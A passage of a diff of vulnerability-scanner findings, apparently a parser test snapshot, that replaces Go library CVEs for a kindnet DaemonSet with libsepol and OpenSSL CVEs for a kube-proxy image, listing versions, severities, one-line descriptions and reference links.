"URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-36084", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://access.redhat.com/security/cve/CVE-2021-36084", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31065", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "https://linux.oracle.com/cve/CVE-2021-36084.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://ubuntu.com/security/notices/USN-5391-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36084", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20201110031124-69a78807bb2b", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36085", + "installedVersion": "3.1-1", + "packageName": "libsepol1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "https://access.redhat.com/security/cve/CVE-2021-36085", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", + "https://linux.oracle.com/cve/CVE-2021-36085.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36085", ], }, "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __verify_map_perm_classperms and hashtab_map).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", + "name": "libsepol: use-after-free in __cil_verify_classperms()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", + "value": "https://avd.aquasec.com/nvd/cve-2021-36085", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", + "value": "https://access.redhat.com/security/cve/CVE-2021-36085", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://go.dev/cl/468135", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://linux.oracle.com/cve/CVE-2021-36085.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5391-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36085", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.0.0-20210428140749-89ef3d95e781", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-31525", - "installedVersion": "v0.0.0-20201110031124-69a78807bb2b", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36086", + "installedVersion": "3.1-1", + "packageName": "libsepol1", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-31525", - "https://github.com/advisories/GHSA-h86h-8ppg-mxmh", - "https://github.com/golang/go/issues/45710", - "https://go.dev/cl/313069", - "https://go.dev/issue/45710", - "https://go.googlesource.com/net/+/89ef3d95e781148a0951956029c92a211477f7f9", - "https://groups.google.com/g/golang-announce/c/cu9SP4eSXMc", - "https://linux.oracle.com/cve/CVE-2021-31525.html", - "https://linux.oracle.com/errata/ELSA-2021-3076.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ISRZZ6NY5R2TBYE72KZFOCO25TEUQTBF/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-31525", - "https://pkg.go.dev/vuln/GO-2022-0236", - "https://security.gentoo.org/glsa/202208-02", - "https://www.cve.org/CVERecord?id=CVE-2021-31525", + "https://access.redhat.com/security/cve/CVE-2021-36086", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", + "https://linux.oracle.com/cve/CVE-2021-36086.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36086", ], }, "category": "Vulnerability", - "description": "net/http in Go before 1.15.12 and 1.16.x before 1.16.4 allows remote attackers to cause a denial of service (panic) via a large header to ReadRequest or ReadResponse. Server, Transport, and Client can each be affected in some configurations.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission (called from cil_reset_classperms_set and cil_reset_classperms_list).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "golang: net/http: panic in ReadRequest and ReadResponse when reading a very large header", + "name": "use-after-free in cil_reset_classpermission()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-31525", + "value": "https://avd.aquasec.com/nvd/cve-2021-36086", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-31525", + "value": "https://access.redhat.com/security/cve/CVE-2021-36086", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-h86h-8ppg-mxmh", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/45710", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://go.dev/cl/313069", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://go.dev/issue/45710", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://go.googlesource.com/net/+/89ef3d95e781148a0951956029c92a211477f7f9", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/cu9SP4eSXMc", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-31525.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-3076.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ISRZZ6NY5R2TBYE72KZFOCO25TEUQTBF/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-31525", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0236", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-31525", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/cve/CVE-2021-36086.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5391-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36086", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20201110031124-69a78807bb2b", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36087", + "installedVersion": "3.1-1", + "packageName": "libsepol1", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "https://access.redhat.com/security/cve/CVE-2021-36087", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", + "https://linux.oracle.com/cve/CVE-2021-36087.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36087", ], }, "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any (called indirectly from cil_check_neverallow). This occurs because there is sometimes a lack of checks for invalid statements in an optional block.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", + "name": "libsepol: heap-based buffer overflow in ebitmap_match_any()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://avd.aquasec.com/nvd/cve-2021-36087", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "https://access.redhat.com/security/cve/CVE-2021-36087", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://linux.oracle.com/cve/CVE-2021-36087.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://ubuntu.com/security/notices/USN-5391-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36087", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.0.0-20220412211240-33da011f77ad", - "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-29526", - "installedVersion": "v0.0.0-20201112073958-5cba982894dd", - "packageName": "golang.org/x/sys", + "fixedVersion": "1.1.1n-0+deb11u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1292", + "installedVersion": "1.1.1n-0+deb11u1", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-29526", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - "https://github.com/advisories/GHSA-p782-xgp4-8hr8", - "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", - "https://github.com/golang/go/issues/52313", - "https://go.dev/cl/399539", - "https://go.dev/cl/400074", - "https://go.dev/issue/52313", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", - "https://linux.oracle.com/cve/CVE-2022-29526.html", - "https://linux.oracle.com/errata/ELSA-2022-5337.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", - "https://pkg.go.dev/vuln/GO-2022-0493", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220729-0001/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-1292", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", + "https://linux.oracle.com/cve/CVE-2022-1292.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", + "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220602-0009/", + "https://security.netapp.com/advisory/ntap-20220729-0004/", + "https://ubuntu.com/security/notices/USN-5402-1", + "https://ubuntu.com/security/notices/USN-5402-2", + "https://www.cve.org/CVERecord?id=CVE-2022-1292", + "https://www.debian.org/security/2022/dsa-5139", + "https://www.openssl.org/news/secadv/20220503.txt", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", - "location": 